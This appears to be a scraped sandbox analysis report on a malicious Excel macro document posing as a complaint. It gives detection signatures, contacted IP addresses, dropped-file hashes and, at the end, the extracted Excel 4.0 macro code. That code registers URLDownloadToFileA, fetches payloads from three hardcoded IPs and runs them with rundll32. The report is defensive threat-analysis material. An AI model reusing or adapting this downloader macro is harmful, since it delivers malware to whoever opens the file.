Loading ...

Play interactive tourEdit tour

Analysis Report Complaint_1713723004_04122021.xlsm

Overview

General Information

Sample Name:Complaint_1713723004_04122021.xlsm
Analysis ID:386500
MD5:a4c21b67f5b8a52b143697fad19fadba
SHA1:bdb665fe0760a6d568a269e0c792bf6a2284568b
SHA256:254e090511681f16592a5afc242f0ded71c03a4a15292117f06a24aaad59fc19
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malicious Excel 4.0 Macro
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Found Excel 4.0 Macro with suspicious formulas
Allocates a big amount of memory (probably used for heap spraying)
Potential document exploit detected (unknown TCP traffic)
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2384 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
Source: excel.exeMemory has grown: Private usage: 4MB later: 32MB
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 37.46.133.194:80
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 37.46.133.194:80
Source: global trafficTCP traffic: 192.168.2.22:49169 -> 185.212.129.66:80
Source: unknownTCP traffic detected without corresponding DNS query: 37.46.133.194
Source: unknownTCP traffic detected without corresponding DNS query: 37.46.133.194
Source: unknownTCP traffic detected without corresponding DNS query: 37.46.133.194
Source: unknownTCP traffic detected without corresponding DNS query: 37.46.133.194
Source: unknownTCP traffic detected without corresponding DNS query: 37.46.133.194
Source: unknownTCP traffic detected without corresponding DNS query: 37.46.133.194
Source: unknownTCP traffic detected without corresponding DNS query: 185.212.129.66
Source: unknownTCP traffic detected without corresponding DNS query: 185.212.129.66
Source: unknownTCP traffic detected without corresponding DNS query: 185.212.129.66
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\62042346.gifJump to behavior

System Summary:

barindex
Found malicious Excel 4.0 MacroShow sources
Source: Complaint_1713723004_04122021.xlsmInitial sample: urlmon
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable editing button from the yellow bar above 15 0 Once you have enabled editing, please click En
Source: Screenshot number: 4Screenshot OCR: Enable Content button from the yellow bar above 16 17 18 19 20 21 22 ' 23 24 25 26 27 2
Source: Document image extraction number: 0Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
Source: Document image extraction number: 0Screenshot OCR: Enable Content button from the yellow bar above
Source: Document image extraction number: 1Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
Source: Document image extraction number: 1Screenshot OCR: Enable Content button from the yellow bar above
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: Complaint_1713723004_04122021.xlsmInitial sample: EXEC
Source: Complaint_1713723004_04122021.xlsmInitial sample: EXEC
Source: Complaint_1713723004_04122021.xlsmInitial sample: EXEC
Source: classification engineClassification label: mal64.expl.evad.winXLSM@1/7@0/2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Complaint_1713723004_04122021.xlsmJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD393.tmpJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Complaint_1713723004_04122021.xlsmInitial sample: OLE zip file path = xl/media/image1.gif
Source: Complaint_1713723004_04122021.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting2Path InterceptionExtra Window Memory Injection1Masquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution11Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySystem Information Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Scripting2Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Extra Window Memory Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Public

IPDomainCountryFlagASNASN NameMalicious
37.46.133.194
unknownRussian Federation
29182THEFIRST-ASRUfalse
185.212.129.66
unknownGermany
200313INTERNET-ITNLfalse

General Information

Joe Sandbox Version:31.0.0 Emerald
Analysis ID:386500
Start date:14.04.2021
Start time:11:21:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 4m 18s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:Complaint_1713723004_04122021.xlsm
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:4
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal64.expl.evad.winXLSM@1/7@0/2
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .xlsm
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
37.46.133.194Complaint_186157059_04122021.xlsmGet hashmaliciousBrowse
  • 37.46.133.194/44285,5327891204.dat
Complaint_186157059_04122021.xlsmGet hashmaliciousBrowse
  • 37.46.133.194/44285,5327891204.dat
185.212.129.66Complaint_186157059_04122021.xlsmGet hashmaliciousBrowse
  • 185.212.129.66/44285,5327891204.dat
Complaint_186157059_04122021.xlsmGet hashmaliciousBrowse
  • 185.212.129.66/44285,5327891204.dat

Domains

No context

ASN

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
THEFIRST-ASRUv8iFmF7XPp.dllGet hashmaliciousBrowse
  • 78.24.219.147
Complaint_186157059_04122021.xlsmGet hashmaliciousBrowse
  • 37.46.133.194
Complaint_186157059_04122021.xlsmGet hashmaliciousBrowse
  • 37.46.133.194
RFQ12-ADM2020pdf.exeGet hashmaliciousBrowse
  • 82.146.43.143
Powerful Installer.exeGet hashmaliciousBrowse
  • 82.202.170.60
RFQ11_ZIM2021pdf.exeGet hashmaliciousBrowse
  • 82.146.43.143
7aVA3z2w4w.exeGet hashmaliciousBrowse
  • 212.109.198.4
FTT103634332.exeGet hashmaliciousBrowse
  • 92.63.102.63
norton360.exeGet hashmaliciousBrowse
  • 62.109.7.229
C4fKBZh6Bk.exeGet hashmaliciousBrowse
  • 212.109.218.124
zENdMC2mFV.exeGet hashmaliciousBrowse
  • 62.109.18.166
iz8AtqlQeh.exeGet hashmaliciousBrowse
  • 92.63.99.163
dd7211d8c5d8b0e6290b9eb79787d64b73a91bde129cc.exeGet hashmaliciousBrowse
  • 92.63.99.163
862e41d1ddfa72722af62eb35aac11970ed21b6a7f01c.exeGet hashmaliciousBrowse
  • 92.63.99.163
MsBDqyJWav.exeGet hashmaliciousBrowse
  • 83.220.174.101
SecuriteInfo.com.Trojan.Siggen12.46475.27996.exeGet hashmaliciousBrowse
  • 92.63.99.163
ab76e3ddfecc8c84fd2179bb40cbe1c535963154c3e6e.exeGet hashmaliciousBrowse
  • 92.63.99.163
vQBTkn3dvP.exeGet hashmaliciousBrowse
  • 62.109.18.166
SecuriteInfo.com.Trojan.Siggen12.47248.30665.exeGet hashmaliciousBrowse
  • 92.63.99.163
SecuriteInfo.com.Trojan.Siggen12.47248.964.exeGet hashmaliciousBrowse
  • 92.63.99.163
INTERNET-ITNLihZK5LsiNE.exeGet hashmaliciousBrowse
  • 185.212.131.111
spvIr9SNFe.exeGet hashmaliciousBrowse
  • 185.212.131.111
Shipping-Documents.xlsxGet hashmaliciousBrowse
  • 185.212.131.111
Purchase Order.exeGet hashmaliciousBrowse
  • 185.212.131.111
BANKINV28032021VBNSINO.xlsxGet hashmaliciousBrowse
  • 185.212.131.111
Complaint_186157059_04122021.xlsmGet hashmaliciousBrowse
  • 185.212.129.66
Complaint_186157059_04122021.xlsmGet hashmaliciousBrowse
  • 185.212.129.66
Contract_132508562.xlsmGet hashmaliciousBrowse
  • 185.212.131.194
Contract_132508562.xlsmGet hashmaliciousBrowse
  • 185.212.131.194
Contract_132508562.xlsmGet hashmaliciousBrowse
  • 185.212.131.194
Contract_657752239.xlsmGet hashmaliciousBrowse
  • 185.212.131.194
Contract_657752239.xlsmGet hashmaliciousBrowse
  • 185.212.131.194
Contract_657752239.xlsmGet hashmaliciousBrowse
  • 185.212.131.194
Contract_1836733707.xlsmGet hashmaliciousBrowse
  • 185.212.131.194
Contract_1836733707.xlsmGet hashmaliciousBrowse
  • 185.212.131.194
Contract_1836733707.xlsmGet hashmaliciousBrowse
  • 185.212.131.194
Closure TP-Stamp.htmGet hashmaliciousBrowse
  • 185.212.131.109
audio.htmGet hashmaliciousBrowse
  • 45.88.3.244
AxR7BY4wzz.exeGet hashmaliciousBrowse
  • 185.212.128.49
SecuriteInfo.com.Trojan.Siggen12.41502.7197.exeGet hashmaliciousBrowse
  • 185.212.128.49

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\62042346.gif
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:GIF image data, version 89a, 1600 x 1600
Category:dropped
Size (bytes):158055
Entropy (8bit):7.981278766139217
Encrypted:false
SSDEEP:3072:4XE59b4DETZU4yvUCidynhV912A7bF8mrcLwKw55eiETTcDGq:AE5SDvbXAyHbVt15wTQDl
MD5:CB67CED3017DF7803FBA5D86FCEB4276
SHA1:C7B8B4A44BDF7F7775F61FCF236A0834CB321733
SHA-256:C31F711B323EA0B1D04C7A72ECAC0BBBF4DC4ECC56F837FEFE754F53385D07B1
SHA-512:1E70FD6101A50A0AEDFF22C2DB22A5FB4E063C02E6C062097A973FED663E6623BDA2FFA33B266001AB99BA5AA945FA51C1571C553015C8F8633D68BFA7F663D1
Malicious:false
Reputation:moderate, very likely benign file
Preview: GIF89a@.@.p..!.......,....@.@.......3..f..........+..+3.+f.+..+..+..U..U3.Uf.U..U..U......3..f..............3..f..............3..f.............3..f.........3..3.33.f3..3..3..3+.3+33+f3+.3+.3+.3U.3U33Uf3U.3U.3U.3..3.33.f3..3..3..3..3.33.f3..3..3..3..3.33.f3.3..3..3..3.33.f3..3..3..f..f.3f.ff..f..f..f+.f+3f+ff+.f+.f+.fU.fU3fUffU.fU.fU.f..f.3f.ff..f..f..f..f.3f.ff..f..f..f..f.3f.ff.f..f..f..f.3f.ff..f..f.......3..f.........+..+3.+f.+..+.+..U..U3.Uf.U..U.U......3..f.............3..f.............3..f............3..f.............3..f..........+..+3.+f.+..+..+..U..U3.Uf.U..U..U....3.f.........3.f...........3..f.............3..f..............3..f..........+..+3.+f.+..+..+..U..U3.Uf.U..U..U......3..f..............3..f..............3..f.............3..f........................y..Hp.....*L.p....J.Hq.../j..q.. ?..Ir..(O.L.r..0_.Is...=...y.M..@y.....O.>......D...z.h.L.<e...6..tm....9.......Y.d..]....h...V._.^...kv-.e...6...i.>N..1....C....d.n.}..,..bM_.<:.h.
C:\Users\user\AppData\Local\Temp\8CDE0000
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:data
Category:dropped
Size (bytes):173575
Entropy (8bit):7.961400788755953
Encrypted:false
SSDEEP:3072:MadXE59b4DETZU4yvUCidynhV912A7bF8mrcLwKw55eiETTcDGv7:MahE5SDvbXAyHbVt15wTQDS
MD5:83E146A0F9EB837C5481B3226786DACE
SHA1:2D2B69F47EEBCE4C93F515D2A21FC1A954C29E66
SHA-256:8EBB3FD109500D3D2282FFD88BCB7FD827104F3B481767ECDAFA002CB02AF373
SHA-512:E6A1E8BDD5EDFD5D186CD27FBAA501956AD6D44D07CC6A9A4DEEAEE56A50567C76BD843AAF7684E6A7B87413DF2F14BCE902F23BF7009FD5A684230083F5E9C5
Malicious:false
Reputation:low
Preview: ...n.0.E.......D'-....E....I?.&G.a..a...;...5...v..5s...3..5..D.......J..e?..._X.I8%.w.. ....7}X......lH)|....V`..8Z.|.".k.y.r!z....g..K.R.r.6..@'.M.n..y.d......eT.D.FK.H(.rj.R........R7."...@...Q.1.CJd....`p.t..".....Y?@.+.]...u...m.f.N^~..F....1}.....?...{.h.cs1-..`.R.......s..&.{.t.T"...........NJ..:..B...G..\....0.....?.$........9.K.V.../cN.:.). "..D]..s...>.CE.%.....It.K-......#...KK..u.D...mS...D...;....R...y.y._.......PK..........!........4.......[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Complaint_1713723004_04122021.LNK
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:13 2020, mtime=Wed Apr 14 17:21:41 2021, atime=Wed Apr 14 17:21:41 2021, length=173575, window=hide
Category:dropped
Size (bytes):2228
Entropy (8bit):4.529554610227899
Encrypted:false
SSDEEP:48:8ORQP/XT3IkAIKCWSIM+Qh2ORQP/XT3IkAIKCWSIM+Q/:8ORy/XLIkx+Qh2ORy/XLIkx+Q/
MD5:80BFB8AF461F58FD059D25A3CA325D8B
SHA1:B8D3CC5A08981066974785C760FD4B561E3B9B7D
SHA-256:873E66A12B5AD4DABC592D6209529361E72E21154918C64A6B689C0776C9FD7C
SHA-512:CF3FA757076F0E8B02E43780E63E87FFBD1363A5E03C08A26564EBAE71F8311444A7D0BC3AF722A356CEF5F61B22C1405EFFCB405B3BEEF0927B8479FC95A46E
Malicious:false
Reputation:low
Preview: L..................F.... ...8.E..{......[1..}t..[1...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2......R.. .COMPLA~1.XLS..r.......Q.y.Q.y*...8.....................C.o.m.p.l.a.i.n.t._.1.7.1.3.7.2.3.0.0.4._.0.4.1.2.2.0.2.1...x.l.s.m.......................-...8...[............?J......C:\Users\..#...................\\061544\Users.user\Desktop\Complaint_1713723004_04122021.xlsm.9.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.C.o.m.p.l.a.i.n.t._.1.7.1.3.7.2.3.0.0.4._.0.4.1.2.2.0.2.1...x.l.s.m.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Wed Apr 14 17:21:41 2021, atime=Wed Apr 14 17:21:41 2021, length=8192, window=hide
Category:dropped
Size (bytes):867
Entropy (8bit):4.472116605142472
Encrypted:false
SSDEEP:12:85QEKLgXg/XAlCPCHaXgzB8IB/WMkX+Wnicvb7jLbDtZ3YilMMEpxRljK8CTdJP8:85T8/XTwz6I0zYefbDv3q+rNru/
MD5:64DEBF1A6B821E4984CEF996E356B28B
SHA1:19438F0774CFAE0B5B5077A5E7305BCA84EA5858
SHA-256:008F94E34907D281B905394BACBB4596728728DEF9629B6192F48B04E835BAFA
SHA-512:B5EB20D3F3090F37731DB6582F58B60F0C17060A94168B6E7C6981862CAB3D6121EA029C26FF6D16DF65D8266863C7EA463D5AD843E5F3171060A6E69F9068C3
Malicious:false
Reputation:low
Preview: L..................F...........7G..}t..[1..}t..[1... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R....Desktop.d......QK.X.R..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\061544\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......061544..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):142
Entropy (8bit):4.613891707512004
Encrypted:false
SSDEEP:3:oyBVomxWt1l6eW6VR4pl+1l6eW6VR4plmxWt1l6eW6VR4plv:dje1lvUpalvUpz1lvUp1
MD5:7A1D090B833A0EAC78BD895AFDBDD21A
SHA1:EC1771847A82C98025F77FD95D44CFC03C0B1869
SHA-256:94E9CBBA52095BFCF6B9BB6BC82B93CF0B857B27BA38D345BEBB7D5E9D264A8F
SHA-512:64CA804BF65FC872BC1AE462F9B396D6D0906E409A5FEED516044C039C745A033CC164D0F44C400217E64EB354BA5D53E2D52389707839F53DFA314B5C1FA56C
Malicious:false
Reputation:low
Preview: Desktop.LNK=0..[misc]..Complaint_1713723004_04122021.LNK=0..Complaint_1713723004_04122021.LNK=0..[misc]..Complaint_1713723004_04122021.LNK=0..
C:\Users\user\Desktop\2DDE0000
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:data
Category:dropped
Size (bytes):173575
Entropy (8bit):7.961400788755953
Encrypted:false
SSDEEP:3072:MadXE59b4DETZU4yvUCidynhV912A7bF8mrcLwKw55eiETTcDGv7:MahE5SDvbXAyHbVt15wTQDS
MD5:83E146A0F9EB837C5481B3226786DACE
SHA1:2D2B69F47EEBCE4C93F515D2A21FC1A954C29E66
SHA-256:8EBB3FD109500D3D2282FFD88BCB7FD827104F3B481767ECDAFA002CB02AF373
SHA-512:E6A1E8BDD5EDFD5D186CD27FBAA501956AD6D44D07CC6A9A4DEEAEE56A50567C76BD843AAF7684E6A7B87413DF2F14BCE902F23BF7009FD5A684230083F5E9C5
Malicious:false
Reputation:low
Preview: ...n.0.E.......D'-....E....I?.&G.a..a...;...5...v..5s...3..5..D.......J..e?..._X.I8%.w.. ....7}X......lH)|....V`..8Z.|.".k.y.r!z....g..K.R.r.6..@'.M.n..y.d......eT.D.FK.H(.rj.R........R7."...@...Q.1.CJd....`p.t..".....Y?@.+.]...u...m.f.N^~..F....1}.....?...{.h.cs1-..`.R.......s..&.{.t.T"...........NJ..:..B...G..\....0.....?.$........9.K.V.../cN.:.). "..D]..s...>.CE.%.....It.K-......#...KK..u.D...mS...D...;....R...y.y._.......PK..........!........4.......[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\Desktop\~$Complaint_1713723004_04122021.xlsm
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:data
Category:dropped
Size (bytes):330
Entropy (8bit):1.4377382811115937
Encrypted:false
SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
MD5:96114D75E30EBD26B572C1FC83D1D02E
SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
Malicious:true
Reputation:high, very likely benign file
Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Static File Info

General

File type:Microsoft Excel 2007+
Entropy (8bit):7.962037667569484
TrID:
  • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
  • ZIP compressed archive (8000/1) 16.67%
File name:Complaint_1713723004_04122021.xlsm
File size:174329
MD5:a4c21b67f5b8a52b143697fad19fadba
SHA1:bdb665fe0760a6d568a269e0c792bf6a2284568b
SHA256:254e090511681f16592a5afc242f0ded71c03a4a15292117f06a24aaad59fc19
SHA512:5e1554ff6f3f1859abdb5ff2ed74aec8f70bf14fbf67ab06e1e7cd6bc2c75d671d0dda94f0b733c2fb6a08f38eec667c1eebca06506808b0a5f6a55a0336ff0c
SSDEEP:3072:vXE59b4DETZU4yvUCidynhV912A7bF8mrcLwKw55eiETTcDG5:PE5SDvbXAyHbVt15wTQDi
File Content Preview:PK..........!.... ....4.......[Content_Types].xml ...(.........................................................................................................................................................................................................

File Icon

Icon Hash:e4e2aa8aa4bcbcac

Static OLE Info

General

Document Type:OpenXML
Number of OLE Files:1

OLE File "Complaint_1713723004_04122021.xlsm"

Indicators

Has Summary Info:
Application Name:
Encrypted Document:
Contains Word Document Stream:
Contains Workbook/Book Stream:
Contains PowerPoint Document Stream:
Contains Visio Document Stream:
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:

Macro 4.0 Code

"=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=EXEC(""rundll32 ""&""..\Hodas.vyur1""&"",DllRegisterServer"")=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()"=GOTO(Hi!D1)
"=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=EXEC(""rundll32 ""&""..\Hodas.vyur""&"",DllRegisterServer"")=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()"=GOTO(Jo!E3)
,,=NOW(),,,,,,,,"=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=FORMULA(CC280&CC281,CE271)=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()",,,,,,,"=CONCATENATE(CC274,CD266,CC273)",,,,,,,,"=CONCATENATE(CC275,CD266,CC273)","=NOW()=NOW()=NOW()=REGISTER(CE270,CE271,CE269,CE273,,1,9)=NOW()=NOW()",JJCCJJ,,,,,,"=CONCATENATE(CC276,CD266,CC273)","=NOW()=NOW()=NOW()=REGISTER(CE270,CE271,CE272,CE273,,1,9)",uRlMon,,,,,,,"=NOW()=NOW()=NOW()=Belandes(0,CC268,""..\Hodas.vyur"",0,0)",,,,,,,,"=NOW()=NOW()=NOW()=Belandes(0,CC269,""..\Hodas.vyur1"",0,0)",JJCCBB,,,,,,"="".dat""","=NOW()=NOW()=NOW()=Belandes(0,CC270,""..\Hodas.vyur2"",0,0)",Belandes,,,,,,"=""http://37.46.133.194/""",,,,,,,,"=""http://185.212.129.66/""",,,,,,,,"=""http://190.14.37.248/""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,URLDown,,,,,,,,loadToFileA,,,,,,,,,,,,,,,,,=GOTO(Ger!G10),,,,,,
